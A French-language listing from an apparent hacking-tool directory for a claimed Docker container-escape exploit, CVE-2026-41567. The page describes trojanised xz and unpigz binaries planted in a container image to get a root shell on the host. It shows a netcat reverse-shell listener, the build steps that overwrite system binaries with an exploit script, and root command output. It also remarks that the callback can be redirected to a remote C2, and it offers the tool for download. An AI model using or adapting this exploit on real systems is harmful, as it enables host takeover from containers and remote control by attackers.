Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2026-41567 — Exploite l'évasion Docker CVE-2026-41567 à l'aide de binaires xz/unpigz troyanisés pour obtenir un shell root sur l'hôte depuis l'intérieur d'un conteneur. | Kitploit
Outils/GitHubGitHub/berdav/cve-2026-41567
Analyse des VulnérabilitésExploitationÉvasion de Conteneur
GitHubberdav/cve-2026-41567

CVE-2026-41567

Exploite l'évasion Docker CVE-2026-41567 à l'aide de binaires xz/unpigz troyanisés pour obtenir un shell root sur l'hôte depuis l'intérieur d'un conteneur.

Voir le dépôt
il y a 1 jourPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2026-41567 1day

Un 1-day pour Docker Escape CVE-2026-41567.

C'est une démonstration d'évasion docker utilisant du xz / unpigz trojanisés.

Il peut être facilement modifié pour être utilisé à distance (par exemple, il suffit de modifier l'IP par défaut de docker avec un C2 distant).

Plus d'informations sur l'exploit ici

PoC

Lancez un netcat en écoute sur le port 50005 sur l'hôte

root@kitploit:~
ubuntu@ubuntu-noble:~/CVE-2026-41567$ nc -vlp  50005
Listening on 0.0.0.0 50005
Connection received on ubuntu-noble 35722
# whoami
root
# cat /etc/hostname
ubuntu-noble
# exit

Exécutez ensuite le script test.sh. Si l'exploit fonctionne, vous obtiendrez immédiatement un shell root.

root@kitploit:~
ubuntu@ubuntu-noble:~/CVE-2026-41567$ sudo ./test.sh
DEPRECATED: The legacy builder is deprecated and will be removed in a future release.
            Install the buildx component to build images with BuildKit:
            https://docs.docker.com/go/buildx/

Sending build context to Docker daemon  19.97kB
Step 1/7 : FROM debian
 ---> 34cd9e9fd437
Step 2/7 : RUN apt update && apt install -y ncat
 ---> Using cache
 ---> c85c9eb10bff
Step 3/7 : COPY exploit.sh /usr/bin/xz
 ---> Using cache
 ---> b84efa8058e7
Step 4/7 : RUN chmod +x /usr/bin/xz
 ---> Using cache
 ---> 423b0e1891a6
Step 5/7 : COPY exploit.sh /usr/bin/unpigz
 ---> Using cache
 ---> 74eff85cf988
Step 6/7 : RUN chmod +x /usr/bin/unpigz
 ---> Using cache
 ---> 2f773fa12931
Step 7/7 : CMD [ "sleep", "9999999" ]
 ---> Using cache
 ---> 7b99f12dbe8d
Successfully built 7b99f12dbe8d
Successfully tagged cve-2026-41567:latest
cve-2026-41567
5679a4dc643c65a20039de693fad1f1caeea7fe5760b5c4049d1d4f37f5ab825
tar: Removing leading `/' from member names
/etc/hosts
Successfully copied 0B to cve-2026-41567:/tmp

Notez que vous devez disposer des privilèges nécessaires pour communiquer avec le démon Docker (généralement être root).

Télécharger l’outil